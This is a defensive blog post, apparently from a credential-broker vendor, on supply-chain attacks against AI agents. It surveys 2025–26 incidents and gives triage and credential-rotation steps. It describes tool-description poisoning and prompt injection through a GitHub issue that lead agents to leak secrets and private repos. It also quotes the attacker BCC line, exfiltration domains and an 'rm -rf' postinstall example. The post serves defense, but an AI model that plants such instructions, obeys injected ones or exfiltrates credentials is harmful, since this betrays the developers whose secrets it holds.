Supply chain risks for AI agents: malicious MCP servers, poisoned skills, and how to triage

You shipped an agent this year. It probably runs in Cursor or Claude Code, calls three or four MCP servers, has a handful of skills installed, and pulls a fresh npm or PyPI dependency about once a week. Something an LLM suggested.

Then one of the headlines from the last twelve months lands in your Slack. postmark-mcp was BCC'ing every email to a stranger. nx@21.5.0 shipped a postinstall script that used your own claude CLI to find your secrets. litellm==1.82.7 exfiltrated your AWS credentials. The Anthropic MCP Inspector had a 9.4 RCE. A VS Code fork was recommending malware because the namespace was unclaimed on Open VSX.

The question you actually want answered is not "is agent supply chain bad". You know it is. The question is:

Which class of attack does my stack actually expose me to that normal CI does not?
How do I tell if a thing is poisoned before I run it?
If I already ran it, what do I rotate first?

This post is that field guide. It is opinionated, it links every CVE and advisory so you can verify, and it ends with a triage checklist you can paste into a runbook.

Why the agent supply chain is wider than the normal one

For a normal Node service, your supply chain is package.json, your lockfile, your base image, and whatever your CI pulls. Bad enough.

An agent stack pulls from at least five injection vectors at once:

MCP servers. Long-lived processes the agent trusts to read files, send mail, query databases. Often installed with one line of JSON.
Skills, plugins, and IDE extensions. Cursor extensions, Claude Code skills, Open VSX entries. Auto-recommended by the IDE.
npm / PyPI dependencies. Same as ever, except now the agent picks the package name from a hallucination.
System prompts and tool descriptions. Plain text the model reads as instructions. Anyone who controls a tool description controls partial behavior.
Inbound data with prompt injection. GitHub issues, emails, Slack messages, PDFs, web pages. Read by the agent, executed as instructions.

Each is an injection vector. The same compromise that would have stolen one developer's npm token in 2023 now hands the attacker everything an agent has been authorized to do across half a dozen services. Worth re-reading our four threat models for agent security in 2026 for the framing.

The 2025-26 incidents, by category, with sources

Malicious MCP servers

postmark-mcp (npm, September 2025). A package impersonating the real Postmark product, no affiliation. The maintainer shipped fifteen benign releases to build trust, then in v1.0.16 on September 17, 2025 added a single line at line 177: Bcc: 'phan@giftshop.club'. Every outbound email through the server was silently BCC'd to the attacker until the package was removed on September 25, 2025. Roughly 1,643 downloads before removal, per public reporting. Sources: Snyk writeup, Postmark's own statement, The Hacker News.

Tool poisoning (Invariant Labs, April 2025). Malicious instructions hidden in a tool's description, not its code. The host model reads tool descriptions when it plans, so the poisoned tool fires before it is ever called. Invariant demonstrated two patterns against Cursor: an add tool that exfiltrated SSH keys and MCP config secrets, and "tool shadowing", where a malicious MCP server rewrote how a trusted email tool behaved so all email was silently redirected. They also showed a "rug pull": a benign tool that mutates its description after install-time trust is granted. Source: Invariant Labs disclosure, summarized by Simon Willison.

GitHub MCP toxic flow (Invariant Labs, May 2025). A public GitHub issue with embedded prompt injection coerced a developer's agent (running the official GitHub MCP server) into reading a private repo and opening a public PR that leaked the contents. Source: Invariant writeup.

MCP infrastructure CVEs

CVE-2025-49596 · MCP Inspector unauthenticated RCE. The official Anthropic tool for testing MCP servers did not authenticate the client to the proxy. A malicious web page could trigger MCP commands on a developer workstation. CVSS 4.0 score 9.4. Affected < 0.14.1. Disclosed by Oligo Security and published in NVD on June 13, 2025.

CVE-2025-6514 · mcp-remote OS command injection. The proxy that lets local MCP clients connect to remote servers. A malicious remote server could return a crafted authorization_endpoint URL during OAuth init; mcp-remote passed it straight to open(). CVSS 9.6. Affected 0.0.5 through 0.1.15, fixed in 0.1.16. Disclosed by JFrog Security Research in July 2025 when the package had 437,000+ weekly downloads.

Plus a steady stream of others on the authzed MCP breach timeline: CVE-2025-53109 and CVE-2025-53110 (Anthropic Filesystem MCP sandbox escape, August 2025), CVE-2025-59528 (Flowise critical STDIO flaw, September 2025), CVE-2025-53967 (Figma/Framelink MCP command injection, October 2025).

Compromised legitimate packages weaponizing AI CLIs

Nx "s1ngularity" (August 26, 2025). Malicious Nx versions 20.9.0 through 21.8.0 shipped a postinstall script that called locally installed claude, gemini, and Amazon q CLIs to recursively scan the filesystem for sensitive paths, writing them to /tmp/inventory.txt. Double-base64 encoded the result and pushed it to a public repo named s1ngularity-repository on the victim's own GitHub account. GitGuardian's analysis counted 2,349 distinct stolen secrets across 1,079 systems, 85% on macOS, 33% with an LLM CLI installed. A follow-on wave on August 28 made 10,767 previously private repos public, exposing roughly 82,901 more secrets. Sources: Nx postmortem, Wiz writeup, Snyk analysis.

This was one of the first npm attacks publicly documented to deliberately weaponize local AI CLIs. The CLI was the search tool. The installed claude binary was the malware's recon agent.

Shai-Hulud (npm worm, September 2025). First disclosed September 15, 2025; CISA advisory September 23, 2025. A self-replicating npm worm: stole credentials, then used the victim's npm token to npm publish itself into other packages the victim maintained. Shai-Hulud 2.0 in November 2025 widened to 25,000+ malicious repositories across roughly 350 publisher accounts (Microsoft writeup, Sysdig). A May 11, 2026 resurgence spanned both npm and PyPI in one coordinated push: 170+ npm packages, 2 PyPI packages, 404 malicious versions, all chosen for relevance to AI developer tooling (Unit 42).

LiteLLM PyPI compromise (March 24, 2026). Versions litellm==1.82.7 and litellm==1.82.8 shipped a credential stealer that POSTed env vars, SSH keys, AWS, GCP, Azure credentials, Kubernetes tokens, and database passwords to models.litellm.cloud, an attacker-controlled domain unaffiliated with LiteLLM. PyPI quarantined the release within roughly 40 minutes. Clean release 1.83.0 shipped March 30 via a rebuilt CI/CD pipeline. Root cause was attributed to credential theft via the broader Trivy CI compromise. Sources: LiteLLM security update, Sonatype analysis.

Malicious skills, extensions, and IDE-recommendation hijack

MaliciousCorgi (January 26, 2026). Two VS Code Marketplace extensions sold as ChatGPT integrations: whensunset.chatgpt-china with 1,340,869 installs and zhukunpeng.chat-moss with 151,751 installs. They read every opened file, base64-encoded the contents, and POSTed to a server in China. Also supported remote-triggered exfil of up to 50 files and four Chinese analytics SDKs for fingerprinting. Roughly 1.5M installs combined. Sources: The Hacker News, BleepingComputer.

GlassWorm (October 2025). Self-propagating malware on Open VSX, the registry used by Cursor, Windsurf, Google Antigravity, and other VS Code forks. Hides its payload in printable but non-rendering Unicode characters so the malicious code looks like blank lines in an editor or GitHub diff. First wave: seven extensions, roughly 36,000 downloads, harvested npm, GitHub, and Git creds, drained 49 crypto wallet extensions. Sources: Dark Reading, SecurityWeek.

IDE-recommendation hijack (Koi Security, January 6, 2026). When VS Code forks ship a hardcoded "recommended extension" list inherited from upstream, the upstream IDs (PostgreSQL, Azure Pipelines, Heroku, others) often do not exist on Open VSX. Anyone could claim those namespaces and the IDE would actively recommend the malicious extension. Koi pre-claimed six namespaces with placeholders and got over 1,000 trust-based installs in days. Sources: Koi writeup, The Hacker News.

Koi Security has also published broader research on agent skill marketplaces, cataloguing skills that look fine on the listing then quietly mutate or call out after install. The methodology is what matters more than any single store's headline count.

Slopsquatting

The category most specific to agents. Attackers register the names that LLMs hallucinate. The USENIX Security 2025 paper on package hallucinations tested 16 models across 576,000 code samples: hallucination rate roughly 21.7% on open-source models, 5.2% on commercial. Of the hallucinations, 38% are conflations like express-mongoose, 13% typo variants, 51% pure fabrications. Trend Micro's slopsquatting writeup and Aikido both document real examples in the wild of malicious packages registered against AI-suggested names that exfiltrated secrets on install.

If your agent runs in any kind of YOLO or auto-install mode, the suggestion is the install. The model has effectively become an unreviewed maintainer of your package.json.

The five threat-model categories, condensed

Category	Example	First read
Malicious package	postmark-mcp 1.0.16, slopsquatted AI-suggested names	Brand new package, no history, install runs a network call
Compromised legitimate package	Nx s1ngularity, LiteLLM 1.82.7, Shai-Hulud	Trusted name, weird new postinstall, sudden version bump
Malicious MCP server	postmark-mcp, tool poisoning demos	New server in `mcp.json`, descriptions that mention secrets
Malicious skill or plugin	MaliciousCorgi, GlassWorm, Open VSX squats	Reads files it does not need, network egress at startup
Malicious system prompt or tool description	Invariant tool poisoning, GitHub toxic flow	Tool description contains imperative instructions to the model

How to triage before you run something

A short pre-flight that takes two minutes per install. Worth running on every new MCP server, every new skill, every new dependency the agent suggested for itself.

1. Scan your installed MCP servers

Invariant Labs ship mcp-scan for tool poisoning, cross-origin escalation, and rug-pull detection. Run it against your real configs:

bash

# One-off scan of your local MCP configs (Cursor, Claude Desktop, Windsurf)
uvx mcp-scan@latest

# Pin a version and point at a specific config
uvx mcp-scan@latest scan ~/.cursor/mcp.json

2. Patch the two MCP infrastructure CVEs

If you have ever used MCP Inspector or mcp-remote, check the versions now:

bash

# CVE-2025-49596 fix
npm ls -g @modelcontextprotocol/inspector
npm i -g @modelcontextprotocol/inspector@latest   # must be >= 0.14.1

# CVE-2025-6514 fix
npm ls -g mcp-remote
npm i -g mcp-remote@latest                        # must be >= 0.1.16

Only point mcp-remote at HTTPS endpoints you actually trust.

3. Kill npm lifecycle scripts by default

Every postinstall attack in this post (Nx, Shai-Hulud, the LiteLLM equivalent) relied on a script running at install time. Switch the default off and opt in per package:

bash

# Globally disable npm lifecycle scripts unless you opt in
npm config set ignore-scripts true

# Per-install opt-out when you do not need build scripts
npm install --ignore-scripts <package>

For pnpm 9+, use the explicit allow-list:

ini

# .npmrc
side-effects-cache=false
onlyBuiltDependencies[]=esbuild
onlyBuiltDependencies[]=sharp

The npm docs cover --ignore-scripts under npm install.

4. Close the dependency-confusion door

Scope your private namespace to your private registry, full stop:

ini

# .npmrc at repo root
@your-org:registry=https://npm.pkg.github.com
//npm.pkg.github.com/:_authToken=${GITHUB_TOKEN}
# Refuse to fall through to public npm for the @your-org scope

For Python, prefer a single internal index that mirrors PyPI over --extra-index-url. The latter still considers both indexes and the highest version wins, which is exactly the dependency-confusion bug. Reference: pip install docs.

5. Read the tool descriptions like they are code

Because they are. Anything imperative addressed to "the model" or "the assistant", anything that mentions reading SSH keys, env vars, ~/.npmrc, or "system files for context" is the attack. The Invariant add-tool demo is the canonical example.

6. Audit what is even installed

A few one-liners worth keeping in a runbook:

bash

# Hunt for the s1ngularity drop-file on macOS dev boxes
find /tmp -name 'inventory.txt' -newer /tmp/.last_check 2>/dev/null

# List every globally-installed npm package's postinstall script
npm ls -g --depth=0 --parseable | xargs -I{} sh -c \
  'jq -r ".scripts.postinstall // empty" "{}/package.json" 2>/dev/null'

# Enumerate the binaries every configured MCP server launches
find ~/.cursor ~/.claude -name 'mcp.json' \
  -exec jq -r '.. | .command? // empty' {} \; | sort -u

If you already ran the bad thing

Speed matters more than precision. Rotate in this order.

Every env var in the affected shell. AWS_*, GCP_*, AZURE_*, OPENAI_API_KEY, ANTHROPIC_API_KEY, GITHUB_TOKEN, NPM_TOKEN, plus ~/.npmrc, ~/.pypirc.
SSH keys. ~/.ssh/id_*. Rotate locally, re-add to GitHub and GitLab.
Browser-stored credentials. Shai-Hulud and the AMOS-class stealers grab these.
GitHub PATs and fine-grained tokens. Revoke at https://github.com/settings/tokens. Check the account for unexpected new public repos with names like *s1ngularity-repository*. See token hygiene for AI agents for the longer version.
OAuth refresh tokens for every service the agent had access to. Slack, Linear, Stripe, GitHub Apps, Google Workspace. Revoke at the provider, not just locally.
Audit outbound traffic for the known IOCs: giftshop.club for postmark-mcp, models.litellm.cloud for LiteLLM 1.82.7-8, s1ngularity-repository repos for Nx.

If your agent ran with long-lived dotenv files full of provider keys, assume all of them are compromised. Cleaning a developer machine after Shai-Hulud is not a five-minute job.

The honest spot where a credential broker helps, and where it does not

Every incident on this list that successfully stole credentials worked because the credentials were sitting in plaintext somewhere the postinstall script could read them: ~/.npmrc, ~/.aws/credentials, ~/.ssh/id_ed25519, OPENAI_API_KEY in the process environment, MCP config JSON with hard-coded bearer tokens.

A credential broker like Authsome narrows the blast radius of a few of these categories. You run authsome run -- <your agent command> and the agent process sees only a placeholder like OPENAI_API_KEY=authsome-proxy-managed. A local HTTPS proxy swaps in the real Authorization header as the request leaves. The agent never holds the key, so a postinstall script that greps the environment finds nothing useful.

Be honest about what this does and does not buy you.

It helps with:

Postinstall stealer (Nx, LiteLLM class). The shell the postinstall runs in does not have OPENAI_API_KEY or GITHUB_TOKEN exported as the real value. There is nothing in env to steal beyond the placeholder.
MCP config theft. Hard-coded bearer tokens in mcp.json are a common loot target. With a broker, the config holds a placeholder.
Global egress control during a run. Authsome supports a global allow/deny proxy mode per run, which lets you refuse calls to unexpected hosts at the proxy boundary.

It does not help with:

Code execution. A postinstall script that runs rm -rf does that whether or not your tokens are vaulted. Use --ignore-scripts, sandbox the install, run an SBOM scanner.
Prompt injection or tool poisoning at the model layer. That is what mcp-scan, request-level allow-lists, and structured tool-use guards exist for.
A malicious MCP server that is itself authorized to send mail. If the broker hands postmark-mcp a Postmark token because the agent asked it to, and the server BCCs every message, the broker did its job and the server still did the damage. Vetting the server is the control here, not the broker.
Browser-stored credentials and SSH private keys on disk. Those are not what the broker manages.
A pip install of a slopsquatted package, until and unless that package then tries to call out as your identity.

Defense in depth. A broker is one layer. Patching MCP Inspector, killing postinstall scripts, scoping registries, and reading tool descriptions are the others.

What I would do this week

If you have shipped an agent in the last twelve months:

Grep your machine for the specific bad versions. npm ls -g nx, pip show litellm, npm ls -g postmark-mcp, npm ls -g @modelcontextprotocol/inspector, npm ls -g mcp-remote.
Run mcp-scan against every mcp.json on the box.
Set npm config set ignore-scripts true globally. Opt back in per package.
Move provider keys out of dotfiles and env into a broker that injects at request time. Or whatever your equivalent control is. The point is to make plaintext theft useless.
Write the rotation order from the triage section into a runbook before you need it.

The supply chain for agents is wider than for normal software because an agent reaches further. The fix is the same one we have always had, applied to more surfaces: trust less by default, scope what you do trust, audit what runs.

Next steps

Quickstart

Run your agent so it never holds the real key. Authsome injects credentials at the proxy boundary.

Four threat models for AI agent security

The sibling deep-dive on prompt injection, credential theft, tool abuse, and supply chain.

How prompt injection becomes credential exfiltration

Why a poisoned tool description ends with your tokens leaving the box.

MCP server authentication in 2026, ranked

What good MCP server auth looks like, so you can spot the bad ones earlier.

Supply chain risks for AI agents: malicious MCP servers, poisoned skills, and how to triage

Why the agent supply chain is wider than the normal one

The 2025-26 incidents, by category, with sources

Malicious MCP servers

MCP infrastructure CVEs

Compromised legitimate packages weaponizing AI CLIs

Malicious skills, extensions, and IDE-recommendation hijack

Slopsquatting

The five threat-model categories, condensed

How to triage before you run something

1. Scan your installed MCP servers

2. Patch the two MCP infrastructure CVEs

3. Kill npm lifecycle scripts by default

4. Close the dependency-confusion door

5. Read the tool descriptions like they are code

6. Audit what is even installed

If you already ran the bad thing

The honest spot where a credential broker helps, and where it does not

What I would do this week

Next steps

Quickstart

Four threat models for AI agent security

How prompt injection becomes credential exfiltration

MCP server authentication in 2026, ranked

Further reading

Supply chain risks for AI agents: malicious MCP servers, poisoned skills, and how to triage

Building a DevOps agent: cluster, cloud, PagerDuty, GitHub, without a single long-lived key

Building a DevOps agent: cluster, cloud, PagerDuty, GitHub, without a single long-lived key